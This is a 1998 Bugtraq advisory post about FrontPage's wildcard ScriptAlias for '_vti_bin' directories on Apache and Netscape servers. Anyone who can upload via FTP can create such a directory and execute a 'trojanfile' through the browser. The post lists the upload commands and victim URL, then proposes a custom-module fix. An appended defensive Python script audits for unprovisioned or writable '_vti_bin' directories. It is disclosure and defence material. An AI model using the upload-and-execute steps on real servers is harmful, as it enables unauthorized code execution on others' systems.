[6588] in bugtraq
Another Frontpage Bug, with promiscuous ScriptAliases
daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Thu Apr 23 22:37:30 1998
Date: Thu, 23 Apr 1998 18:35:34 -0700
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
To: BUGTRAQ@NETSPACE.ORG
The Apache hack that M$ distributes allows one to create ANY directory
on a Frontpage enabled web server, and execute content in it.
This also goes for the stock Netscape Server config that M$ recommends.
Hmm, I wonder if M$ deliberately places security holes in Unix apps so
that they can claim "but Frontpage under IIS doesn't have that hole!".
Mainly because IIS loads Frontpage as a DLL (I suppose). Frontpage
wouldn't be anywhere near the PIG it is if it ran as an Apache module
or NSAPI module...but then who has an extra 5 megs per server process
to burn???
EG:

You want a rogue program to run, and the victim has anonymous uploadable
FTP (or you sign up for a service and you want to run binaries on the
server, but can't):

    mkdir _vti_bin
    cd _vti_bin
    put [whatever bin]

Web browser:

    http://www.victim.com/somedirectorystructure/_vti_bin/trojanfile

Boom you've got stuff runnin on that server.

They configure the Netscape server the same way.
Unless you make a special NSAPI or Apache module, you're vulnerable
as a freshly born ewe of a cloned sheep named Dolly!

And why is this possible???

    ScriptAlias "*/_vti_bin/*" /somedirpath

    <Object ppath="*/_vti_bin/*">
    ...
    </Object>

Solution:

Custom NSAPI / Apache module:

    NameTrans fn="prefix_fpdir" prefix_path="/somedir/cgi-bin/frontpage" name="cgi"

Plus:

Custom Stub:

    /somedir/cgi-bin/frontpage/cgi-wrapper [path to real binary]

--Perry
--
Perry Harrington System Software Engineer zelur xuniL ()
http://www.webcom.com perry.harrington@webcom.com Think Blue. /\
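
A defensive check for the condition described in this message, added here as an example that is not part of the original post or of any FrontPage, Apache or Netscape tooling: while the wildcard `*/_vti_bin/*` mapping is in place, every directory named `_vti_bin` under the document root is executable, so the audit walks the tree and reports any such directory the administrator did not provision, plus any that is group- or other-writable. The function names, the `provisioned_webs` list and the sample tree are assumptions constructed for the illustration.

```python
import os
import stat
import tempfile

SCRIPT_DIR = "_vti_bin"  # directory name the wildcard mapping treats as executable


def audit_vti_bin(docroot, provisioned_webs):
    """Return sorted (relative_path, reason) findings under docroot.

    provisioned_webs: docroot-relative web roots where the admin knowingly
    installed FrontPage ("" is the root web). Assumed to be known.
    """
    allowed = {os.path.normpath(os.path.join(docroot, web, SCRIPT_DIR))
               for web in provisioned_webs}
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        if os.path.basename(dirpath) != SCRIPT_DIR:
            continue
        rel = os.path.relpath(dirpath, docroot)
        # A _vti_bin nobody installed was created some other way (e.g. upload).
        if os.path.normpath(dirpath) not in allowed:
            findings.append((rel, "not provisioned: %d file(s) inside" % len(filenames)))
        # Even a provisioned script directory must not accept new files.
        if os.stat(dirpath).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((rel, "writable by group/other"))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample docroot: one provisioned web, one upload-created dir."""
    root = tempfile.mkdtemp()
    good = os.path.join(root, SCRIPT_DIR)
    bad = os.path.join(root, "pub", "incoming", SCRIPT_DIR)
    os.makedirs(good)
    os.makedirs(bad)
    os.chmod(good, 0o755)
    os.chmod(bad, 0o777)
    open(os.path.join(bad, "uploaded.bin"), "w").close()
    return root


if __name__ == "__main__":
    for rel, reason in audit_vti_bin(build_sample_tree(), provisioned_webs=[""]):
        print(rel, "-", reason)
```

Run against a real document root, the output is the list of places where the wildcard mapping would execute content that was never installed as part of a FrontPage web.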